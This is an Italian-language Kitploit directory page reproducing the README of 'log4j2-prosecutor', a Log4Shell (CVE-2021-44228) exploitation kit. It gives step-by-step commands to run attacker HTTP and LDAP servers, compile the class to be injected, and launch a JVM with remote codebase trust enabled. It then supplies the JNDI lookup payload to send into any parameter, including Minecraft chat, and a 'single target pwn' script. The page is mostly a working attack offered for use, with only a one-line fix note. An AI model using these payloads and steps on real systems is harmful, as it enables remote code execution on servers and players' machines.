Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j2-prosecutor — CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/rodfer0x80/log4j2-prosecutor
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubrodfer0x80/log4j2-prosecutor

log4j2-prosecutor

CVE-2021-44228

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

log4j2-prosecutor

Motivazione

Questa vulnerabilità fondamentale è stata segnalata da [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) e corretta da [questo articolo. (Note di rilascio 8u121)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)

Tuttavia, la libreria di logging per Java chiamata log4j2 aveva (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java), che permetteva l'accesso a protocolli come LDAP, consentendo l'iniezione di codice nelle versioni più vecchie di Java.

Le versioni corrette di Java possono prevenire l'iniezione di codice, ma `JNDILookup` effettua richieste al server LDAP, il che può portare a perdite di IP.

La soluzione è aggiornare le versioni di **Java** e **log4j2**.

Esecuzione

  1. Installa i requisiti
root@kitploit:~
cd http-server && npm install && cd ../ldap-server && npm install
  1. Esegui sia http-server che ldap-server
root@kitploit:~
cd http-server && node index.js &
cd ldap-server && node index.js
  1. Compila Main.java
root@kitploit:~
# Questo genererà Main.java - richiesto per l'iniezione di codice.
# OSx
./java-single-compile <Main.java>
# Linux 
javac <Main.java>
  1. Avvia la JVM con i parametri
root@kitploit:~
# Puoi ancora usare log4j-client nel repository per test interni.
cd log4j-client &&\
		gradle jar &&\
		java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Oppure esegui un'altra applicazione; com.sun.jndi.ldap.object.trustURLCodebase=true è richiesto per l'iniezione di codice, altrimenti effettuerà solo la richiesta al server LDAP.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
  1. Invia il payload a qualsiasi parametro come payload (Su Minecraft, basta chattare questo se l'exploit funziona.)
root@kitploit:~
${jndi:ldap://127.0.0.1:3001/}
  1. Pulizia
root@kitploit:~
NODEP=`pgrep node`
for id in $NODEP; do
    kill $id
done

Scripts

root@kitploit:~
# Single target pwn
# Modifica exploit-configs.txt con URL e parametri
cd scripts/single-pwn && python3 __main__.py

Riferimenti

  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/NCSC-NL/log4shell
  • https://github.com/ilsubyeega/log4j2-exploits/
  • https://raw.githubusercontent.com/ferderplays/Log4j_exploit/main/Exploit.java
  • https://www.blumira.com/analysis-log4shell-local-trigger/ (da fare)

Licenza [GPL3]

Vedi la licenza in LICENSE

Scarica lo strumento